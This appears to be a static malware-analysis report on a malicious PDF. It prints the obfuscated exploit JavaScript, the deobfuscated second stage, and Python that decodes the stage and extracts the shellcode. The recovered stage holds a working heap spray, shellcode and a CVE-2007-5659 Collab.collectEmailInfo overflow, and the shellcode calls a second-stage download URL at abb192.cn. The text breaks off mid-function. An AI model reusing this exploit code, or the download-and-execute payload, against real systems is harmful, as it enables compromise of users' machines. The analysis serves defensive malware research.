Malicious PDF — malware analysis report

Static analysis result for SHA-256 dc7ee54c3edfbcbe…

MALICIOUS

PDF

Size: 4.6 KB
Created: 2008-08-06 01:42:27
Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
First seen: 2026-05-08
MD5: 6a9b3ba3f22f734715e5cd759204f6c6
SHA-1: be8a73d8d827f3568828ff57aeb9410ce8b06d8f
SHA-256: dc7ee54c3edfbcbeb67feadf55502aacecb601abaf0ba8a37d8d2b190938cf99
Risk score: 308

Malware Insights

MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript
T1203 Exploitation for Client Execution
T1105 Ingress Tool Transfer

The PDF's /JavaScript action runs a /JS stream (object 13) whose code is name-mangled and assembled from string fragments inside eval() calls (PDF_JAVASCRIPT, PDF_JS, PDF_JS_EXPLOIT_CLUSTER). Static stage recovery decoded it through a custom 6-bit XOR-table decoder into a second stage that sprays the heap with 4 MiB blocks of NOP sled plus shellcode up to address 0x0c0c0c0c and, when app.viewerVersion reports a version its gate accepts (8.0.x, 8.1.0, 8.1.1, 7.0.x, or anything older than 7), calls Collab.collectEmailInfo() with a 65,536-character msg of 0x0c0c filler: the CVE-2007-5659 buffer overflow. The tail of the shellcode carries the second-stage URL http://abb192.cn/spl3/load.php?id=8761&spl=4 in the clear, consistent with a urlmon/URLDownloadToFile-style download-and-execute. No specific malware family could be confidently identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a stack-based buffer overflow in Adobe Reader and Acrobat 8.1.1 and earlier, triggered by an over-long msg argument to Collab.collectEmailInfo(); exploits pair it with a heap spray so the overwritten control-flow address lands in attacker-controlled data. It is one of a series of Acrobat JavaScript API bugs abused the same way. In this sample the call appears only in the recovered second stage, with a 65,536-character msg of 0x0c0c filler. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function LeTBRvixNFgNg0(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function vGgJDdWTh(eHBOUVj){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(eHBOUVj)"+";"+"}");eval("function J5iS7MfcIU(LsceO1B){var iWg7wYVgmmQZ="+"0,DQeGa1=LsceO1B.l"+"en"+"gth,LphDl=10"+"2"+"4,HUgOqM2,MDRjp69qGLzh1,g2ILr1Z='',Ps7vHxI=iWg7wYVgmmQZ,SAWWt=iWg7wYVgmmQZ,m3CtOBaOQrP=iWg7wYVgmmQZ,AGkntyg=Ar"+"ra"+"y(63,19,2,48,61,9,41,35,62,4 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=8761&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: javascript_obj0013_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 13 at offset 0x36C
Size: 6292 bytes
SHA-256: 90133d3338b2ee3799597afbb8b94a4512ddee396cd614ecc1e7debf277e31db
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 193 of 257 identifiers look randomly generated (e.g. 'H6HnpnZ6wS8YpnZ6wCzSwnZOZTB4wnZ6'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function LeTBRvixNFgNg0(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function vGgJDdWTh(eHBOUVj){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(eHBOUVj)"+";"+"}");eval("function J5iS7MfcIU(LsceO1B){var iWg7wYVgmmQZ="+"0,DQeGa1=LsceO1B.l"+"en"+"gth,LphDl=10"+"2"+"4,HUgOqM2,MDRjp69qGLzh1,g2ILr1Z='',Ps7vHxI=iWg7wYVgmmQZ,SAWWt=iWg7wYVgmmQZ,m3CtOBaOQrP=iWg7wYVgmmQZ,AGkntyg=Ar"+"ra"+"y(63,19,2,48,61,9,41,35,62,44,0,0,0,0,0,0,36,37,58,31,22,47,52,16,42,33,34,26,56,7,50,25,14,0,32,45,46,53,11,38,8,13,43,0,0,0,0,15,0,4,27,12,51,20,1,6,3,60,29,40,28,23,10,21,54,18,5,30,39,24,49,55,17,57,59);f"+"o"+"r(MDRjp69qGLzh1=M"+"at"+"h.c"+"ei"+"l(DQeGa1/"+"LphDl)"+";MDRjp69qGLzh1>iWg7wYVgmmQZ;MDRjp69qGLzh1-"+"-){fo"+"r(HUgOqM2=Ma"+"th.m"+"in(DQeGa1,LphDl);HUgOqM2>iWg7wYVgmmQZ;HUgOqM2-"+"-,DQeGa1-"+"-){m3CtOBaOQrP|"+"=(AGkntyg[LsceO1B.cha"+"rCod"+"eAt(Ps7vHxI+"+"+)-48])<"+"<SAWWt;if(SAWWt){g2ILr1Z+"+"=vGgJDdWTh"+"(239^m3CtOBaOQrP&"+"2"+"5"+"5);m3CtOBaOQrP>"+">="+"8;SAWWt-"+"="+"2;}el"+"se{SAWWt="+"6"+";}}"+"}return (g2ILr1Z);}var 
ExxDG4NmaH9CJK=implode('',['_t6','7','j','8cJiK5wnT','ZkoHLWtJ4dq0lRnJyd','TpOt','PKy','vg14d5HORcT6IQgLdH','N57bCz','v','XKOwmJ5kZP','id6T6Rsdu','HDH','LWip','4Wg','0cA','_7y','IgPk','J','_CcJDp4Au2BHf_kJfJLWM','D','lw1tBW2BY7','6K6JbNbw','b','KcAXKOwmJ5kZ8','cvq0cJDp4Au2BHeV','ydXKOwm','J5','kZ89F','_7k','AjC5WRTK3lHO7lTO','tgg','XJM0436T6RsduH','DHLWip4WQwSv','e','0ltnT6W','jgLdXKO','wmJ5kZ','q4dq8lJKg','X7','bKX','Rf8i','JSTBS6','JSZATXHpNL6ys9','v_1ydOBut_7KISNzJD','NbHZpZW_V4','d','CCywc8Y7CdLwcq','4d','OBu','t_zOWszSt9Tnk4qHSas','yd','q09W','fHXtcBLtnsld','nZ','yplE','YwnZy','plEYwnZyplEY','wnZyw6','HKZnZ5wlZj','ZnZO','pOdHUnZyUC','wH','UnZyU','C','0SwnZ6H6NYwn','Z6H','jEYwnZ6HSWHZnZ6Hm','0S','pnZO','H6HnZnZOH6WKH','nZyUSJjHnZyH','6TSHnZ6H6HKHnZOpbZK','HnZ6','HlzKH','nZ6U6W4pnZypjtn','wnZ','6U6W4pnZOpHHnpnZ','6H68YwnZ6H6HKZn','ZOp','b','Z','KHnZOZD0','YwnZOpsCY','pnZ6HszHw','nZywu0','YwnZ6H6BSwnZ6H6','H','KHn','Z6ZTWj','pn','ZOZDZKZ','nZ','5puCYpnZOpKz','Swn','ZywuZHwn','Z6H','6B','jHnZ','6H6HKHnZ6ZT','WjpnZOZ','DZn','pnZ5ZT','sYpnZ','6wCZjHnZ','ywuw4','HnZ6H684HnZ6H6HKH','nZ6Z','TWjpnZO','ZDZnwn','ZywCCYp','nZyw6','pSwn','Zyw','uCjHnZ6H6N','jZnZ6H6HKHnZ6ZT','WjpnZOZ','Dt','KH','n','Z','OwHsYpn','ZywTK','jpnZywuZY','pnZ6H','6','pSUnZ','6H','6HKHnZ6ZTW','jpnZ6Z6W','KZnZy','H','utjHnZ','6UT','pYZnZOpOzSpnZOHuz','HZn','Z6Hm0jpnZ6H','6HHHnZOZ','sZ','KHnZ6U','TWjpnZOpbdK','ZnZ6H','SBHZnZ6HHsSpnZO','pbw','KpnZOHuwHZnZ','ywuwH','UnZ6H6W4p','n','Z','6H6HKHnZ','yUuwKHnZOHKEHUnZ6U6NBwnZ5p','m','0YpnZ','6H6HKHnZO','pOZKHnZOH','lzH','ZnZOwTW4pnZ','O','w6W','YZ','nZ','OpO','wKHnZ5Z6BHZnZ6wCCY','pnZ6H6HK','HnZ','OZ6HKHnZ6ZTW4','p','n','ZyUKtKZ','nZO','ZOZBHnZ','OZTW4','pnZ','y','w','utnp','n','Z6H6sS','H','nZ6H6HKHnZ6ZTH','nZnZOwmdKHnZOZlZKHnZ5Z','sbSwnZOw','m','CSZnZ6HSB','KHnZ','y','UT','K','Ypn','Z6H6HK','HnZ6UTB4wnZOpb','dKHnZ6H','lzHZnZ6HHsSpnZOpbw','Kpn','ZOHuwHZnZ6Z68YpnZ','6','H6','H','KHnZyUK','ZKHnZOZuZBUnZ6','ZTHnZnZyH9NK','ZnZOZ9N4','pnZ','6w','CwnZnZ5Z6KS','Zn
ZOZ9pK','HnZ6ZT','W4pn','ZyUK','tnwnZO','ZOZHZnZ','OZT','W4p','nZywutnpnZ6H','6NnZnZ6H6H','KH','nZ','6','H6sSpnZ6UT','B','4w','nZOpbdKHnZ6Hu','z','HZnZ','6HZsSpnZOpbwKpnZ','OHuwHZnZOH','68YpnZ6H6','HKHnZy','UKZ','KHnZOpbz4wnZOH6','B','HZnZ','6HHsSpnZOp','b','w','KpnZOHu','w','HZ','nZ6H','68Y','pnZ6H6H','KHn','Z6','ZHHK','HnZOZZpBpnZyw','HHnZ','nZywHH','nZnZy','wHHn','ZnZ','ywHHn','ZnZ','y','w','l','tYZnZOZKZKZnZ','Op','bw','nZnZ','y','wZ','NSpnZO','ZZB4UnZyw6B4wnZO','pbwHZ','nZOp','b0','YwnZ6Hub','jwnZOZjt4pnZOZD','Znw','nZ6U','9W4pnZO','pbE','nwn','ZOH','sbjZnZ','6H','9KYpn','ZO','ZDzYZ','nZ6','UD','t4pnZ6H9NK','HnZy','H9BYZnZ6Z','Owjp','nZy','pjzH','HnZOw9H','nZnZyH9pHUnZ','6HCzSUnZ','OH6','HSwnZ6wZT','H','pnZ6HubjZnZOws','w','SHnZ6H9H','KwnZ6Z','6','B4HnZ6wH84pnZ6wsE','BpnZ6','U','TpHwnZ','OZ','K','0S','ZnZywbt4','p','nZOZKt4pnZ6H9NKZnZyUDdjwn','Z6','Hlt4p','n','Z','OpbzBpnZOHlwHpnZ5wjZ','nZ','nZ6HSW4pnZ6H9W','4pnZOZswSZnZOwZpKwnZ6','H6HnpnZ6wS8YpnZ6wCzSwnZOZTB4wnZ6','ZlwBHnZ6ZC','zKwnZ6H6BH','wnZ','5p','b','t','4UnZ','5pC74pnZO','w6NSZ','nZOp','s','wjHnZOpjtj','w','nZ5wDd','SwnZO','wHNjwnZOpHW','YwnZ5plwjHnZ','Op9J4wnZ','Ow6','NYwn','ZOp6WYZnZOp','btSwnZ5pCwSH','nZ5pCt4UnZ','OpDdjHnZ5w','ZW4pnZ5','w','ud4UnZ5','wsdjpnZ5pl','wjpnZ','Op9J4w','nZ5wbd','4HYbcU','_t','67j8lEAskEL','84dq0iwm','T4','wC','04wC','14dOBut_dnwkWLpuwy6','BKK','7_V4','dsW6wsz5Z','Z2K','E@K','VImgiRng','XJbsLdr0lwe0lWP','pyd','6T6R','sduH','DH','LWip4W_V4','d','4DB','I8Jzw_VidMdnw','kWLpuwy6B','K','K','7','a','04AlCSve0lWPpydXKOwmJ5kZ89F','_ZORnN57','P86J','Mw9N','KK4','wD0S','NKK4wD0jdg14dXK','OwmJ5kZ89F_Z','n','tcT4SM7kAjC5W','RTB3_','tBW','2','BY76K6JbNb','wbKcU_t6','7j89AU','p6kC0','9F','_CcHrpnEVK5E','6TKEK','893_0','4A','b04wC04w','g','hlEAskE','L8','YU_t','X','Rj','8iv','OBut_VH7uhkU2KV6q0YUJB','X','pQKSRpq','BFDDbtJ8','YUJBXpQKSRp','qnvabide','8cJ','i','K5','wn','TZko','HLW','tJYSJBX','pQKSRpqH9_V4dXKOwmJ5','kZ8cv','_zOWszSt9Tnk4','qHSas5','U_Vydq','8lJKgX7','bKX','Rf8','lWt','D','kIc
Ky','vg0c','A','_t67j897XqnECW','XplW6Ru','p4JZ89F_','zLtCg','lWgHXWnpOTn','p5tg2uRfE5RiTOtg','gXJMbcU_zXJ@Nzt5JYt','OnXWjELH_V4dPJX6i8OJudOW','2JO','wVT','K3jHL','t','hB','X','7ns','c3','dTn','3XPldYbcU_t67j8cH','QDbAIBz','kL2nTQKj','H889F_MkJ','u89Zjp67D','s97Xq','nE','CWXplW6','Rup4JZgc7MBu','tTTyvCbi3PJ','X6i','8OJ','udOW2JO','wVTK3csk7j','BBWMzSvhz','XJ','@','N','zt5JYtOnX','WjE','LHfdLIPp6','Zbslwgb','cU','_buJ_Civk','2uSogHE7JVkL2','kU6BVSCVzd','qV4dm0lN50ivM7','nRU','DOk8PnTRJVRDtHE','F','BS','9_VSF_z','4d','5tidk','2uSogHE','7JVkL','2kU6BVSjVzd10lwg0i@18','cHQDbAIBzkL2nTQKjH8qZ','wN8','iF_zSvg0i@18ivk2uS','ogHE','7J','VkL2kU6','BVSCVzd','qV4du0lN50cHQD','bAIBzkL2nTQKj','H8','qZwN8iF','_z','S','v__','y','@_CcHQDbAIBzkL2nTQKjH8qzwN8iF_','7Svg','0cA_E','uZZsbH','uzK6VJHScsKTMbcU','_t67','j8i','6JgkTCT','Ldq09Wf','HXtc','BLt','nsld','nZ','ywc8Y','7nZywc8Y7Ybc','U','_7yIg','Pk','JMCHkfHztVg','iRn','gXJbsL','d10i','pbb','Sp','jbidtnK','R','B8','yJ','_19F_CHkfHztVq4d','b','s','kIlgc','7QPLR','PpXEb2ut','n8','9F_dnRhPk7','Ygc','7QPL','RnNL','WHnk7gPk6fWXRM15tKpuI','o0ldY_9RlJ','uU_CHkfHztVn6ve09@_Vy','dOsKIgNkA','MbcU']);");eval(J5iS7MfcIU(ExxDG4NmaH9CJK));}
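The first stage above assembles its decoder from string fragments inside eval() and feeds it the implode()'d payload; the stage-recovery rule classifies that decoder as a custom 6-bit XOR table. The Python below is an added reimplementation, not code from the sample or from the analysis tool: decode_sixbit_xor() mirrors the sample's J5iS7MfcIU() (its 75-entry table copied verbatim, LSB-first 6-bit packing, every output byte XORed with 239), and encode_sixbit_xor() is my own inverse, present only so the decoder can be round-trip tested. Run on the first 32 characters of the sample's payload (the pieces '_t6', '7', 'j', '8cJiK5wnT', 'ZkoHLWtJ4dq0lRnJyd' joined) it yields the opening of the second stage, " var gSy3eTMzetH7 = new ", which is why the recovered artifact begins with var gSy3eTMzetH7.

```python
"""Reimplementation of the first stage's 6-bit XOR-table decoder.

Added example, not code from the sample or from the analysis tool. The
decoder mirrors the sample's J5iS7MfcIU(); the encoder is my own inverse,
present only so the decoder can be round-trip tested.
"""

XOR_KEY = 239  # the literal in the sample's "239 ^ acc & 255"

# Lookup table copied verbatim from the sample; indexed by ord(ch) - 48.
TABLE = [
    63, 19, 2, 48, 61, 9, 41, 35, 62, 44,                # '0'..'9'
    0, 0, 0, 0, 0, 0,                                    # ':'..'?' (unused)
    36,                                                  # '@'
    37, 58, 31, 22, 47, 52, 16, 42, 33, 34, 26, 56, 7,   # 'A'..'M'
    50, 25, 14, 0, 32, 45, 46, 53, 11, 38, 8, 13, 43,    # 'N'..'Z' ('Q' is symbol 0)
    0, 0, 0, 0,                                          # '['..'^' (unused)
    15,                                                  # '_'
    0,                                                   # '`' (unused)
    4, 27, 12, 51, 20, 1, 6, 3, 60, 29, 40, 28, 23,      # 'a'..'m'
    10, 21, 54, 18, 5, 30, 39, 24, 49, 55, 17, 57, 59,   # 'n'..'z'
]

# The first 32 characters of the implode()'d payload the stage decodes
# (pieces '_t6', '7', 'j', '8cJiK5wnT', 'ZkoHLWtJ4dq0lRnJyd' from the preview).
SAMPLE_PREFIX = "_t67j8cJiK5wnTZkoHLWtJ4dq0lRnJyd"


def decode_sixbit_xor(encoded: str, table=TABLE, key: int = XOR_KEY) -> bytes:
    """Mirror of the sample's decoder loop.

    Each character becomes a 6-bit value via `table`; values are packed
    LSB-first into an accumulator. A byte is emitted whenever the
    accumulator already held a partial byte, so four characters yield three
    bytes (base64's bit budget, but little-endian within the 24-bit group).
    JS precedence makes the sample's "239 ^ acc & 255" mean 239 ^ (acc & 255).
    """
    out = bytearray()
    acc = 0
    shift = 0
    for ch in encoded:
        idx = ord(ch) - 48
        # Out-of-range characters read past the JS array (undefined -> 0).
        val = table[idx] if 0 <= idx < len(table) else 0
        acc |= val << shift
        if shift:
            out.append(key ^ (acc & 0xFF))
            acc >>= 8
            shift -= 2          # 6 -> 4 -> 2 -> 0, then a fresh group starts
        else:
            shift = 6
    return bytes(out)


def _inverse_table(table=TABLE) -> dict:
    """6-bit value -> character. Several unused characters also map to 0;
    'Q' is chosen because it is the one the payload actually uses."""
    inv = {}
    for idx, val in enumerate(table):
        ch = chr(idx + 48)
        if val != 0 or ch == "Q":
            inv[val] = ch
    assert len(inv) == 64, "table must cover every 6-bit value exactly once"
    return inv


def encode_sixbit_xor(raw: bytes, table=TABLE, key: int = XOR_KEY) -> str:
    """My inverse of the decoder (the sample ships no encoder): XOR every
    byte with `key`, pack LSB-first, emit ceil(8n/6) table symbols."""
    inv = _inverse_table(table)
    bits = 0
    for i, b in enumerate(raw):
        bits |= (b ^ key) << (8 * i)
    nsyms = -(-8 * len(raw) // 6)   # ceiling division
    return "".join(inv[(bits >> (6 * k)) & 63] for k in range(nsyms))


def decode_sample_prefix() -> str:
    """Decode the payload prefix; the result is the opening of stage 2."""
    return decode_sixbit_xor(SAMPLE_PREFIX).decode("latin-1")


def roundtrip_ok(data: bytes) -> bool:
    return decode_sixbit_xor(encode_sixbit_xor(data)) == data


if __name__ == "__main__":
    print(repr(decode_sample_prefix()))
    print(roundtrip_ok(bytes(range(256))))
```

The decoder emits a leading space; the recovered artifact shows the same text without it. Because the table is a bijection on the 64 symbols the payload uses and the packing is byte-exact, the same function recovers the whole second stage from the complete implode()'d string. Do that in an isolated analysis environment and never hand the result to eval(): the point of static recovery is to read the stage, not to run it.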
Filename: generic_stage_recovery_000.js
Kind: deobfuscated-js
Source: generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x36C
Size: 2607 bytes
SHA-256: 7a448d4f07d15a02a1b0057dd7bd96bbd738b577cdbeacb561a40c85413ab6a8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Recovered second stage, re-indented with comments for reading; identifiers and logic unchanged.
var gSy3eTMzetH7 = new Array();   // holds the sprayed heap blocks

// Grow a string by doubling until it spans Ftm1cFyetS2t bytes, then trim to exactly that.
// JS string lengths are UTF-16 code units, hence the *2 and /2.
function Esc4X(gy2xwOD, Ftm1cFyetS2t) {
    while (gy2xwOD.length*2 < Ftm1cFyetS2t) { gy2xwOD += gy2xwOD; }
    gy2xwOD = gy2xwOD.substring(0, Ftm1cFyetS2t/2);
    return gy2xwOD;
}

// Heap spray: allocate 4 MiB strings of NOP sled + shellcode until memory reaches 0x0c0c0c0c.
function dBDXF7AJdGYcHV() {
    var GjBSdySFDRu = 0x0c0c0c0c;   // address the overflow will redirect execution to
    // Shellcode as little-endian %uXXXX escapes: a short jmp/pop/xor decoder stub, an 0xEF-XOR-encoded
    // body, and the cleartext download URL at the tail (the bytes that spell http://abb192.cn/...).
    var qv11qCDORKYkx = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3738%u3136%u7326%u6C70%u343D");
    var RJhQW0 = 0x400000;                                  // block size: 4 MiB
    var C3Gf47rHUIb = qv11qCDORKYkx.length * 2;             // shellcode size in bytes
    var Ftm1cFyetS2t = RJhQW0 - (C3Gf47rHUIb + 0x38);       // sled size: sled + shellcode + 0x38 bytes of string overhead fills one block
    var gy2xwOD = unescape("%u9090%u9090");                 // NOP sled seed
    gy2xwOD = Esc4X(gy2xwOD, Ftm1cFyetS2t);
    var yZrM0 = (GjBSdySFDRu - 0x400000)/RJhQW0;            // blocks needed to reach the target: about 47.2, so the loop runs 48 times
    for (var Ma7o9mYK = 0; Ma7o9mYK < yZrM0; Ma7o9mYK++) {
        gSy3eTMzetH7[Ma7o9mYK] = gy2xwOD + qv11qCDORKYkx;
    }
}

// Trigger: version gate, spray, then overflow Collab.collectEmailInfo() (CVE-2007-5659).
function vHjicy() {
    var agKSpf7svmw2dD = app.viewerVersion.toString();
    agKSpf7svmw2dD = agKSpf7svmw2dD.replace(/\D/g, "");   // e.g. "8.1.1" -> "811"
    var GoZzNQLWOWo9FQ = new Array(agKSpf7svmw2dD.charAt(0), agKSpf7svmw2dD.charAt(1), agKSpf7svmw2dD.charAt(2));
    // Fires on 8.0.x, 8.1.0 and 8.1.1, on 7.0.x, and on anything below 7; 8.1.2 and later are skipped.
    if ((GoZzNQLWOWo9FQ[0] == 8 && ((GoZzNQLWOWo9FQ[1] == 1 && GoZzNQLWOWo9FQ[2] < 2) || GoZzNQLWOWo9FQ[1] < 1)) ||
        (GoZzNQLWOWo9FQ[0] == 7 && GoZzNQLWOWo9FQ[1] < 1) ||
        (GoZzNQLWOWo9FQ[0] < 7)) {
        dBDXF7AJdGYcHV();
        var HMnUpd = unescape("%u0c0c%u0c0c");
        while (HMnUpd.length < 44952) HMnUpd += HMnUpd;   // doubles to 65,536 UTF-16 units (128 KiB) of 0x0c0c0c0c
        // The over-long msg overflows a stack buffer; the 0x0c0c0c0c filler is the address execution is
        // redirected to, which the spray above has covered with NOP sled.
        this.collabStore = Collab.collectEmailInfo({subj: "", msg: HMnUpd});
    }
}
vHjicy();
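Three things in the recovered stage are worth extracting by hand rather than taking from the rule text: the bytes Reader would actually hold for the shellcode (JS unescape() %uXXXX escapes are little-endian UTF-16 code units, which is why the URL reported under PDF_JS_SHELLCODE_DOWNLOAD_URL reads correctly only after the byte swap), the shellcode's own XOR decoder loop, and the spray and overflow sizes that follow from the constants 0x0c0c0c0c, 0x400000, 0x38 and 44952. The Python below is an added example, not code from the sample or from the analysis tool. The %u string is copied from the stage above; reading its first 28 bytes as a jmp/pop/xor loop that decodes 0x180 bytes with key 0xEF is my own disassembly, and the function names are mine.

```python
"""Shellcode, embedded URL and spray geometry of the recovered stage.

Added example, not code from the sample or the analysis tool. The %u string
and the constants 0x0c0c0c0c, 0x400000, 0x38 and 44952 come from the stage
above; reading its first 28 bytes as a jmp/pop/xor loop is my disassembly.
"""
import math
import re
import struct

# The shellcode string exactly as the stage passes it to unescape().
SHELLCODE_ESCAPED = (
    "%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805"
    "%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03"
    "%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511"
    "%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3"
    "%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF"
    "%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA"
    "%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF"
    "%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64"
    "%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10"
    "%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34"
    "%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10"
    "%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6"
    "%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC"
    "%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97"
    "%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B"
    "%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364"
    "%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD"
    "%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70"
    "%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3738%u3136%u7326%u6C70%u343D"
)


def js_unescape_to_bytes(s: str) -> bytes:
    """Bytes of the UTF-16 string JS unescape() builds from s: %uXXXX is one
    little-endian code unit ("%u7468" -> b"ht"); %XX and literal characters
    are code units with a zero high byte."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and i + 6 <= len(s):
            out += struct.pack("<H", int(s[i + 2:i + 6], 16))
            i += 6
        elif s[i] == "%" and i + 3 <= len(s):
            out += struct.pack("<H", int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += struct.pack("<H", ord(s[i]))
            i += 1
    return bytes(out)


SHELLCODE = js_unescape_to_bytes(SHELLCODE_ESCAPED)
URL_RE = re.compile(rb"https?://[!-~]+")


def find_urls(blob: bytes) -> list:
    """Cleartext http(s) URLs, as PDF_JS_SHELLCODE_DOWNLOAD_URL looks for them."""
    return URL_RE.findall(blob)


def decode_xor_body(sc: bytes) -> bytes:
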